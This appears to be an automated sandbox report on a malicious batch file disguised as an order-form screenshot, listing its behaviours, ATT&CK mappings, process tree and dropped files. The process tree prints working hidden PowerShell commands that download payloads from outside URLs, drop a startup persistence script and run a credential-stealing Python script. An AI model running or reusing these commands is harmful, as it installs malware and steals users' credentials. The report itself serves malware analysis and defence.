kinsing | cc1d96ef1c10532122a9ff16ef6436ee160d851662dd6d7b795c951b2d6252c3

Resubmissions

26-01-2024 16:49

240126-vbrk6sbegj 10

25-01-2024 17:15

240125-vsktysbde9 10

Analysis

max time kernel
147s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
25-01-2024 17:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Screenshot - Order Form 01 2024.bat
Size

4KB
MD5

848371ca1f49b61c898b6421aa6e2c72
SHA1

6c42909f2ef190982239e98837b66520837a38ec
SHA256

c7eb0aa98b1158dc74e14013dc072420c51095912a4de133b32ef3902be33fdf
SHA512

319635aa0c88d8c6212d8d26100e4dd4dbc5b44c58ad53988948ee4a49badf00fe43ea879bf723ec3463dae02814bbfbba3208649ad14fe095976ede132d34a5
SSDEEP

96:tfXEwhZQHRl3g5ap3q4L/CrSdaAsaAQIik:tfXEwQhjC2ZIn

Score

10^/10

kinsing loader spyware stealer

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://www.mediafire.com/file_premium/c5fcsugpyfpg58q/achung888844494939202930984089054.zip/file

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://breakingmyanmarnews.com/update

Signatures

Kinsing
Kinsing is a loader written in Golang.
loader kinsing
Blocklisted process makes network request 3 IoCs

Processes:

powershell.exepowershell.exe

flow pid process

21 2796 powershell.exe
34 2796 powershell.exe
69 6116 powershell.exe
Deletes itself 1 IoCs

Processes:

python.exe

pid process

5468 python.exe
Drops startup file 1 IoCs

Processes:

powershell.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windowupdates.bat powershell.exe
Executes dropped EXE 1 IoCs

Processes:

python.exe

pid process

5468 python.exe

flow	pid	process
21	2796	powershell.exe
34	2796	powershell.exe
69	6116	powershell.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windowupdates.bat	powershell.exe

Loads dropped DLL 40 IoCs

Processes:

python.exe

pid	process
5468	python.exe
5468	python.exe
5468	python.exe
5468	python.exe
5468	python.exe
5468	python.exe
5468	python.exe
5468	python.exe
5468	python.exe
5468	python.exe
5468	python.exe
5468	python.exe
5468	python.exe
5468	python.exe
5468	python.exe
5468	python.exe
5468	python.exe
5468	python.exe
5468	python.exe
5468	python.exe
5468	python.exe
5468	python.exe
5468	python.exe
5468	python.exe
5468	python.exe
5468	python.exe
5468	python.exe
5468	python.exe
5468	python.exe
5468	python.exe
5468	python.exe
5468	python.exe
5468	python.exe
5468	python.exe
5468	python.exe
5468	python.exe
5468	python.exe
5468	python.exe
5468	python.exe
5468	python.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

71 ipinfo.io
72 ipinfo.io
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Enumerates processes with tasklist 1 TTPs 7 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exe

pid process

5728 tasklist.exe
5724 tasklist.exe
5668 tasklist.exe
5796 tasklist.exe
5848 tasklist.exe
3736 tasklist.exe
5376 tasklist.exe

flow	ioc
71	ipinfo.io
72	ipinfo.io

pid	process
5728	tasklist.exe
5724	tasklist.exe
5668	tasklist.exe
5796	tasklist.exe
5848	tasklist.exe
3736	tasklist.exe
5376	tasklist.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

5516 taskkill.exe

pid	process
5516	taskkill.exe

Suspicious behavior: EnumeratesProcesses 17 IoCs

Processes:

powershell.exemsedge.exemsedge.exeidentity_helper.exepowershell.exepowershell.exepowershell.exe

pid	process
2796	powershell.exe
2796	powershell.exe
1988	msedge.exe
1988	msedge.exe
1464	msedge.exe
1464	msedge.exe
4476	identity_helper.exe
4476	identity_helper.exe
5264	powershell.exe
5264	powershell.exe
5264	powershell.exe
6116	powershell.exe
6116	powershell.exe
6116	powershell.exe
5196	powershell.exe
5196	powershell.exe
5196	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs

Processes:

msedge.exe

pid process

1464 msedge.exe
1464 msedge.exe
1464 msedge.exe
1464 msedge.exe
1464 msedge.exe
1464 msedge.exe

Suspicious use of AdjustPrivilegeToken 12 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exetasklist.exetasklist.exetaskkill.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exe

description	pid	process
Token: SeDebugPrivilege	2796	powershell.exe
Token: SeDebugPrivilege	5264	powershell.exe
Token: SeDebugPrivilege	6116	powershell.exe
Token: SeDebugPrivilege	5196	powershell.exe
Token: SeDebugPrivilege	5376	tasklist.exe
Token: SeDebugPrivilege	5728	tasklist.exe
Token: SeDebugPrivilege	5516	taskkill.exe
Token: SeDebugPrivilege	5724	tasklist.exe
Token: SeDebugPrivilege	5668	tasklist.exe
Token: SeDebugPrivilege	5796	tasklist.exe
Token: SeDebugPrivilege	5848	tasklist.exe
Token: SeDebugPrivilege	3736	tasklist.exe

Suspicious use of FindShellTrayWindow 25 IoCs

Processes:

msedge.exe

pid	process
1464	msedge.exe
1464	msedge.exe
1464	msedge.exe
1464	msedge.exe
1464	msedge.exe
1464	msedge.exe
1464	msedge.exe
1464	msedge.exe
1464	msedge.exe
1464	msedge.exe
1464	msedge.exe
1464	msedge.exe
1464	msedge.exe
1464	msedge.exe
1464	msedge.exe
1464	msedge.exe
1464	msedge.exe
1464	msedge.exe
1464	msedge.exe
1464	msedge.exe
1464	msedge.exe
1464	msedge.exe
1464	msedge.exe
1464	msedge.exe
1464	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

Processes:

msedge.exe

pid	process
1464	msedge.exe
1464	msedge.exe
1464	msedge.exe
1464	msedge.exe
1464	msedge.exe
1464	msedge.exe
1464	msedge.exe
1464	msedge.exe
1464	msedge.exe
1464	msedge.exe
1464	msedge.exe
1464	msedge.exe
1464	msedge.exe
1464	msedge.exe
1464	msedge.exe
1464	msedge.exe
1464	msedge.exe
1464	msedge.exe
1464	msedge.exe
1464	msedge.exe
1464	msedge.exe
1464	msedge.exe
1464	msedge.exe
1464	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.execmd.exemsedge.execmd.exe

description	pid	process	target process
PID 1572 wrote to memory of 920	1572	cmd.exe	cmd.exe
PID 1572 wrote to memory of 920	1572	cmd.exe	cmd.exe
PID 920 wrote to memory of 1464	920	cmd.exe	msedge.exe
PID 920 wrote to memory of 1464	920	cmd.exe	msedge.exe
PID 1464 wrote to memory of 3968	1464	msedge.exe	msedge.exe
PID 1464 wrote to memory of 3968	1464	msedge.exe	msedge.exe
PID 1572 wrote to memory of 3552	1572	cmd.exe	cmd.exe
PID 1572 wrote to memory of 3552	1572	cmd.exe	cmd.exe
PID 3552 wrote to memory of 2796	3552	cmd.exe	powershell.exe
PID 3552 wrote to memory of 2796	3552	cmd.exe	powershell.exe
PID 1464 wrote to memory of 4640	1464	msedge.exe	msedge.exe
PID 1464 wrote to memory of 4640	1464	msedge.exe	msedge.exe
PID 1464 wrote to memory of 4640	1464	msedge.exe	msedge.exe
PID 1464 wrote to memory of 4640	1464	msedge.exe	msedge.exe
PID 1464 wrote to memory of 4640	1464	msedge.exe	msedge.exe
PID 1464 wrote to memory of 4640	1464	msedge.exe	msedge.exe
PID 1464 wrote to memory of 4640	1464	msedge.exe	msedge.exe
PID 1464 wrote to memory of 4640	1464	msedge.exe	msedge.exe
PID 1464 wrote to memory of 4640	1464	msedge.exe	msedge.exe
PID 1464 wrote to memory of 4640	1464	msedge.exe	msedge.exe
PID 1464 wrote to memory of 4640	1464	msedge.exe	msedge.exe
PID 1464 wrote to memory of 4640	1464	msedge.exe	msedge.exe
PID 1464 wrote to memory of 4640	1464	msedge.exe	msedge.exe
PID 1464 wrote to memory of 4640	1464	msedge.exe	msedge.exe
PID 1464 wrote to memory of 4640	1464	msedge.exe	msedge.exe
PID 1464 wrote to memory of 4640	1464	msedge.exe	msedge.exe
PID 1464 wrote to memory of 4640	1464	msedge.exe	msedge.exe
PID 1464 wrote to memory of 4640	1464	msedge.exe	msedge.exe
PID 1464 wrote to memory of 4640	1464	msedge.exe	msedge.exe
PID 1464 wrote to memory of 4640	1464	msedge.exe	msedge.exe
PID 1464 wrote to memory of 4640	1464	msedge.exe	msedge.exe
PID 1464 wrote to memory of 4640	1464	msedge.exe	msedge.exe
PID 1464 wrote to memory of 4640	1464	msedge.exe	msedge.exe
PID 1464 wrote to memory of 4640	1464	msedge.exe	msedge.exe
PID 1464 wrote to memory of 4640	1464	msedge.exe	msedge.exe
PID 1464 wrote to memory of 4640	1464	msedge.exe	msedge.exe
PID 1464 wrote to memory of 4640	1464	msedge.exe	msedge.exe
PID 1464 wrote to memory of 4640	1464	msedge.exe	msedge.exe
PID 1464 wrote to memory of 4640	1464	msedge.exe	msedge.exe
PID 1464 wrote to memory of 4640	1464	msedge.exe	msedge.exe
PID 1464 wrote to memory of 4640	1464	msedge.exe	msedge.exe
PID 1464 wrote to memory of 4640	1464	msedge.exe	msedge.exe
PID 1464 wrote to memory of 4640	1464	msedge.exe	msedge.exe
PID 1464 wrote to memory of 4640	1464	msedge.exe	msedge.exe
PID 1464 wrote to memory of 4640	1464	msedge.exe	msedge.exe
PID 1464 wrote to memory of 4640	1464	msedge.exe	msedge.exe
PID 1464 wrote to memory of 4640	1464	msedge.exe	msedge.exe
PID 1464 wrote to memory of 4640	1464	msedge.exe	msedge.exe
PID 1464 wrote to memory of 4640	1464	msedge.exe	msedge.exe
PID 1464 wrote to memory of 4640	1464	msedge.exe	msedge.exe
PID 1464 wrote to memory of 1988	1464	msedge.exe	msedge.exe
PID 1464 wrote to memory of 1988	1464	msedge.exe	msedge.exe
PID 1464 wrote to memory of 2068	1464	msedge.exe	msedge.exe
PID 1464 wrote to memory of 2068	1464	msedge.exe	msedge.exe
PID 1464 wrote to memory of 2068	1464	msedge.exe	msedge.exe
PID 1464 wrote to memory of 2068	1464	msedge.exe	msedge.exe
PID 1464 wrote to memory of 2068	1464	msedge.exe	msedge.exe
PID 1464 wrote to memory of 2068	1464	msedge.exe	msedge.exe
PID 1464 wrote to memory of 2068	1464	msedge.exe	msedge.exe
PID 1464 wrote to memory of 2068	1464	msedge.exe	msedge.exe
PID 1464 wrote to memory of 2068	1464	msedge.exe	msedge.exe
PID 1464 wrote to memory of 2068	1464	msedge.exe	msedge.exe
PID 1464 wrote to memory of 2068	1464	msedge.exe	msedge.exe
PID 1464 wrote to memory of 2068	1464	msedge.exe	msedge.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Screenshot - Order Form 01 2024.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1572

C:\Windows\system32\cmd.exe
cmd /c start "" https://www.amazon.com/
2⤵
- Suspicious use of WriteProcessMemory
PID:920

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.amazon.com/
3⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1464

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa777146f8,0x7ffa77714708,0x7ffa77714718
4⤵
PID:3968

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2112,3809479313271369027,17610977216093613094,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 /prefetch:3
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:1988

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2112,3809479313271369027,17610977216093613094,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2868 /prefetch:8
4⤵
PID:2068

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,3809479313271369027,17610977216093613094,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:2
4⤵
PID:4640

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,3809479313271369027,17610977216093613094,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1
4⤵
PID:2000

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,3809479313271369027,17610977216093613094,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1
4⤵
PID:1544

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,3809479313271369027,17610977216093613094,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5344 /prefetch:8
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:4476

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,3809479313271369027,17610977216093613094,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5344 /prefetch:8
4⤵
PID:4660

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,3809479313271369027,17610977216093613094,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5412 /prefetch:1
4⤵
PID:4528

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,3809479313271369027,17610977216093613094,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5388 /prefetch:1
4⤵
PID:2292

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,3809479313271369027,17610977216093613094,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5824 /prefetch:1
4⤵
PID:2256

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,3809479313271369027,17610977216093613094,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5848 /prefetch:1
4⤵
PID:4212

C:\Windows\system32\cmd.exe
cmd /c powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.mediafire.com/file_premium/c5fcsugpyfpg58q/achung888844494939202930984089054.zip/file', 'C:\Users\Public\VideoHD4k.zip')"
2⤵
- Suspicious use of WriteProcessMemory
PID:3552

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.mediafire.com/file_premium/c5fcsugpyfpg58q/achung888844494939202930984089054.zip/file', 'C:\Users\Public\VideoHD4k.zip')"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2796

C:\Windows\system32\cmd.exe
cmd /c powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/VideoHD4k.zip', 'C:/Users/Public/VideoHD4k')"
2⤵
PID:5248

C:\Windows\system32\cmd.exe
cmd /c powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://breakingmyanmarnews.com/update', '%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Windowupdates.bat')"
2⤵
PID:6076

C:\Windows\system32\cmd.exe
cmd /c powershell.exe -WindowStyle Hidden -Command "C:\Users\Public\VideoHD4k\python C:\Users\Public\VideoHD4k\update.py"
2⤵
PID:4848

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1648

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3960

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/VideoHD4k.zip', 'C:/Users/Public/VideoHD4k')"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5264

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://breakingmyanmarnews.com/update', 'C:\Users\Admin\AppData\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Windowupdates.bat')"
1⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6116

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden -Command "C:\Users\Public\VideoHD4k\python C:\Users\Public\VideoHD4k\update.py"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5196

C:\Users\Public\VideoHD4k\python.exe
"C:\Users\Public\VideoHD4k\python.exe" C:\Users\Public\VideoHD4k\update.py
2⤵
- Deletes itself
- Executes dropped EXE
- Loads dropped DLL
PID:5468

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist"
3⤵
PID:5320

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist"
3⤵
PID:5548

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist"
3⤵
PID:5740

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist"
3⤵
PID:5704

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist"
3⤵
PID:5832

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist"
3⤵
PID:5820

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist"
3⤵
PID:5696

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im msedge.exe
3⤵
PID:5472

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:5376

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:5728

C:\Windows\system32\taskkill.exe
taskkill /f /im msedge.exe
1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5516

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:5724

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:5668

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:5796

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:5848

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3736

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5344

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
bcaf436ee5fed204f08c14d7517436eb

SHA1
637817252f1e2ab00275cd5b5a285a22980295ff

SHA256
de776d807ae7f2e809af69746f85ea99e0771bbdaaed78a764a6035dabe7f120

SHA512
7e6cf2fdffdcf444f6ef4a50a6f9ef1dfb853301467e3f4784c9ee905c3bf159dc3ee9145d77dbf72637d5b99242525eb951b91c020e5f4e5cfcfd965443258c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
Filesize
111B

MD5
285252a2f6327d41eab203dc2f402c67

SHA1
acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

SHA256
5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

SHA512
11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
5KB

MD5
739834f219d5cdb1b3ab623bfdfc120e

SHA1
62a94ef8cc7b5616d721aa58a76d44f73bb4be80

SHA256
cdd42b8081e1edb6de263f55acf5bfa67b2ad48920a58df1e9c5ae37fa068d46

SHA512
1eca62c3ea13a4802898e78d749234241097b07674d99c6cfe449c7787f0b93332c8cb53869f953af9b291aa98d38abd6594f218c6a0ab005f869d43e1bc1773

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
5KB

MD5
2f449d6e7a2905199b99137970543dbc

SHA1
d4890d76c9aa38a2e7b125efafd71acc5aebd693

SHA256
fbc0aad973c20df06f8aa202f9422cf400910f7435eb172e9d719beb71d611ae

SHA512
537a909534621455b6bbfd7059732003f7d0f38e4693e3e51b937a2facbc1589d1c67e0fc36927c60108c38da952091f1b4df1fa5fe947e763864e639f5d9ec3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
Filesize
24KB

MD5
b0ba6f0eee8f998b4d78bc4934f5fd17

SHA1
589653d624de363d3e8869c169441b143c1f39ad

SHA256
4b5ee509e727accbd11493dda2c1d512e7dbfaff66c4f5f7ea9c2d2ccd06151f

SHA512
e9a165da246c6b80fc38431538203cf03f95794184ff63f00c9500f8919a2028b803f64b670e685185eed72df0509e3185c9b434fdbf2bc7af36021d46bd08d9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
10KB

MD5
fb9cd8c666c0025b415ace182f4dd227

SHA1
cd5e97ff2fe230baf78b8c1cb2b134ccebe7f6ed

SHA256
2f786d1096e818925ba134b585c2e75923a41acda975affc605e434962640f90

SHA512
52872fb09cfa88ef0dfbdd7e0c7935214f890176415f493ae6a7b73d4793b222c4ccc4879144dcceb85032b41576b1c6d8924e2451739c2ac4fd13c6bec28d3e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
7ab00d2b8ad3a0a8426f6a535086b700

SHA1
5b912f4345328372093354ff2ba6a932fef4a8ab

SHA256
cc27d1633ff5a4401c75569e6cd8f98e7ab09f01b8dfb0399f82efe197e0ca0c

SHA512
839e5fbdcc406cee2f37a156ccbb772a80a0231508a7925f95e162990b31ea8366442fcd6073c9035905b47a34d60a3434cc776babf9d49521663b8d3e400584

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
363b1eb3dfb1764b2402db6297e245c4

SHA1
ec00a38b2242ea5408c08471ff811f6bf2499628

SHA256
d47f395191da1080ad7ee7ab7239819e7912a1062c0eb630a632b8b4fc0c026c

SHA512
7d65264751a236fe59d363ca4040692e8700e18db4b93a77ec063bfc5175ffe74d92e66ff231325037ed4a7145a8bf4ff1603690cb1d834b927a6170f388ecc6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
f44a5d89087dc11a433ac25a52ecefbd

SHA1
2076cb8a9c9374791ee0499b83e1574c19345774

SHA256
d61bcd4528f4ef14a2642614bfa3d5506b0647a020bb9bf68dda69097a8629a0

SHA512
